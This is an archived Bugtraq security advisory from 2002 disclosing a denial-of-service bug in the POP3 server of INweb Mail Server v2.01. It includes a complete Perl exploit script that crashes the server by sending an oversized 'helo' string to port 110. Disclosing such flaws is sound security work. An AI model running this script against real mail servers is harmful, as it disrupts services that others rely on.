Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[SecurityOffice] INweb Mail Server v2.01 Denial of Service Vulnerability

From: Tamer Sahin <ts () securityoffice net>
Date: Tue, 12 Nov 2002 18:04:41 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

November 12, 2002

- --[ Product / Vendor

The INweb Mail Server is a standard Internet POP3 and SMTP mail server that runs flawlessly
under Windows 2000 and NT and other windows platforms. The INweb Mail Server provides
numerous unique features for both small and large businesses as well as ISP's. This includes
many facilities to handle spam and viruses.

http://www.inwebmail.com

- --[ Summary

Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3 server included
with INweb Mail Server does not properly handle some types of requests. By submitting a
maliciously crafted request to the POP3 server, an attacker could crash the system, resulting
in a denial of service.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

==================== SNIP ====================

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;

print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "helo:$evil\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

==================== SNIP ====================

- --[ Tested

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Vulnerable

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the
information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts () securityoffice net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback () securityoffice net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security Advisory
is not modified in any way and is attributed to SecurityOffice and provided that such reproduction
and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPdEmnPpL5ibJRTtBAQFrUQf/SEb7sJMKwbC3fAXdv744U3ocKaGuinba
JS4hfpoD/W0pLSKfzeg7HwnrRdc0Xti4vAPILvjLTAbjJLfUIKI/qhiSZneohgPs
/HI6mjVshCs7VK5YGsi84Vjsvb4Bh543DE+EYABNsifZ/o6ZQmv7SmRH8sARA0QD
FUQypTQ0UYZw1l2EKcSH85WLyIO68RxyMChJRcbm7Xuo+oIyPKzC0QX9umpw9ecf
OAGbtx3TW1K/JBJnVn5qE6u8SSyYfxnmAweV/1ImF8pxXPWU2PGojPH9jCQxCgAi
NN7U0DUQgvBQTLT/Sq6xSaUMpJ0y+z1CqGq30i6UWkl0Bku50Il7fA==
=3NIA
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: